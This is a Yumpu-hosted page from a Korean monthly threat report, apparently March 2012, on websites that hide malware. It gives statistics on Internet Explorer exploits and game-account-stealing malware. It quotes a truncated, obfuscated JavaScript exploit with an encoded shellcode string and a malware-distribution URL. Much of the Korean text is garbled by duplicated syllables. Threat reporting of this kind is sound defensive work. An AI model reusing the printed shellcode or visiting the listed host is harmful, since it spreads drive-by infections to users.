03.05.2015 Views

월간 악성코드 은닉사이트 탐지 동향 보고서 월 (3 )

월간 악성코드 은닉사이트 탐지 동향 보고서 월 (3 )

월간 악성코드 은닉사이트 탐지 동향 보고서 월 (3 )

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

악성코드 동향<br />

3월 악성코드 이슈<br />

o ‘12년 3 월월 수집된 악성코드 샘플을을 분석한 결결과과, 다중 취약점을을 악용하는<br />

형태가 많았으으며, 단일일 Internet Explorer 취약점을을 악용하여 악성코드를<br />

유유포하는 형태가<br />

29% 로 가장장 높게 나타났다.<br />

o<br />

악성코드 유유형으으로는 온라인인 게임계계정 탈취형 및 다운운로더형이이 각<br />

35% 로 가장장 높았으으며, 그 이이외에도 추가파일일 다운운로드형,<br />

원원격제어형<br />

등의의 악성코드가 발견견되었다.<br />

□<br />

Internet Explorer 취약점을을 악용한 악성코드 유유포 ( 온라인인 게임계계정 탈취형 )<br />

http://myxih.com/web/ac/hhh.html<br />

...... 생략 ......<br />

// IE<br />

취약점을 악용하여 악성코드 다운로드<br />

<br />

var E8=["Array","length","%u0c","0c%","u0c0c","unescape","substring"];<br />

var<br />

a4=unescape("%u11eb%u4a5a%uc933%u8166%uF3c1%u800C%u0a34%ue294%uebfa%ue805%uffea%<br />

uffff%u7cf4%u9494%u9494%u15c9%u8779%ud484%u1f94%u1961%ua512%ud483%uc494%u917c%u9<br />

492%u1994%u8e12%ud483%uc494%u6d7c<br />

...... 생략 ......<br />

- 7 -

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!